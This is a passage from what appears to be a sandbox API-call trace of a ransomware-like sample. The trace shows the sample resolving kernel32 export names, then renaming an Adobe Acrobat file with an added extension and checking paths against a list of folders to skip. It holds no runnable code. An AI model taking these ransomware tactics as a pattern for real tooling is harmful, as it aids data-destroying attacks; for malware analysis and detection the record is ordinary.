[0179.829] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0179.829] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0179.829] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0179.829] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0179.829] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0179.829] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0179.829] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0179.829] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0179.829] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0179.830] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0179.844] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0179.844] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0179.844] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0179.844] lstrlenA (lpString="CREATEJOBSET") returned 12 [0179.844] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0179.844] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0179.844] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0179.844] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0179.844] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0179.844] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0179.844] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0179.844] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0179.844] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0179.844] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0179.844] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0179.844] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0179.844] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0179.845] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0179.845] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0179.845] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0179.845] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0179.845] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0179.845] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0179.845] lstrlenA (lpString="CREATEPIPE") returned 10 [0179.845] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0179.845] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0179.845] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0179.845] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0179.845] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0179.845] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0179.845] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0179.845] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0179.845] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0179.845] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0179.845] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0179.845] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0179.845] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0179.845] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0179.845] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0179.845] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0179.845] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0179.845] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0179.845] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0179.845] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0179.845] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0179.845] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0179.845] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0179.845] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0179.845] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0179.845] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0179.845] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0179.846] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0179.846] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0179.846] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0179.846] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0179.846] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0179.846] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0179.846] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0179.846] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0179.846] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0179.846] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0179.846] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0179.846] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0179.846] lstrlenA (lpString="CREATETHREAD") returned 12 [0179.846] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0179.846] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0179.846] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0179.846] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0179.846] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0179.846] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0179.846] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0179.846] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0179.846] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0179.846] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0179.846] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0179.846] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0179.846] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0179.846] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0179.846] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0179.846] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0179.846] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0179.846] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0179.846] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0179.846] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0179.846] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0179.846] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0179.846] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0179.846] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0179.846] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0179.847] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0179.847] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0179.847] lstrlenA (lpString="CTRLROUTINE") returned 11 [0179.847] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0179.847] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0179.847] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0179.847] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0179.847] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0179.847] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0179.847] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0179.847] lstrlenA (lpString="DEBUGBREAK") returned 10 [0179.847] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0179.847] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0179.847] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0179.847] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0179.847] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0179.847] lstrlenA (lpString="DECODEPOINTER") returned 13 [0179.847] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0179.847] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0179.847] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0179.847] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0179.847] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0179.847] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0179.847] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0179.847] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0179.847] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0179.847] lstrlenA (lpString="DELETEATOM") returned 10 [0179.847] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0179.847] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0179.847] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0179.847] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0179.847] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0179.847] lstrlenA (lpString="DELETEFIBER") returned 11 [0179.847] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0179.847] lstrlenA (lpString="DELETEFILEA") returned 11 [0179.847] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0179.847] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0179.847] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0179.848] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0179.848] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0179.848] lstrlenA (lpString="DELETEFILEW") returned 11 [0179.848] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0179.848] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0179.848] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0179.848] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0179.848] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0179.848] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0179.848] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0179.848] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0179.848] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0179.848] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0179.848] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0179.848] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0179.848] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0179.848] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0179.848] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0179.848] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0179.848] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0179.848] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0179.848] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0179.848] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0179.848] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0179.848] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0179.848] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0179.848] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0179.848] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0179.848] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0179.848] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0179.848] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0179.848] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0179.848] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0179.848] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0179.848] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0179.848] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0179.848] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0179.849] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0179.849] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0179.849] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0179.849] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0179.849] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0179.849] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0179.849] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0179.849] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0179.849] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0179.849] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0179.849] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0179.849] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0179.849] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0179.849] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0179.849] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0179.849] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0179.849] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0179.849] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0179.849] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0179.849] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0179.849] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0179.849] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0179.849] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0179.849] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0179.849] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0179.849] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0179.849] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0179.849] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0179.849] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0179.849] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0179.849] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0179.849] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0179.849] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0179.850] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0179.850] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.9iJazm") returned 100 [0179.850] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.9iJazm.C9JN") returned 105 [0179.850] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.9iJazm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js.9ijazm"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.9iJazm.C9JN" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js.9ijazm.c9jn"), dwFlags=0x0) returned 1 [0179.851] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.851] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.851] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.852] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec7c9cd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec7c9cd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xa9f95b80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x0, dwReserved1=0x0, cFileName="glob.settings.js.9iJazm", cAlternateFileName="GLOBSE~1.9IJ")) returned 0 [0179.852] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0179.852] CloseHandle (hObject=0x27c) returned 1 [0179.852] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda28e240, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa007fa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa007fa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 1 [0179.852] lstrcmpW (lpString1="Security", lpString2=".") returned 1 [0179.852] lstrcmpW (lpString1="Security", lpString2="..") returned 1 [0179.852] lstrcatW (in: lpString1="Security", lpString2="\\" | out: lpString1="Security\\") returned="Security\\" [0179.852] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpString2="Security\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\" [0179.852] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\Program Files") returned 0x0 [0179.852] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch=":\\Windows") returned 0x0 [0179.852] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\Games\\") returned 0x0 [0179.852] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.852] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.852] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.852] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.852] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS 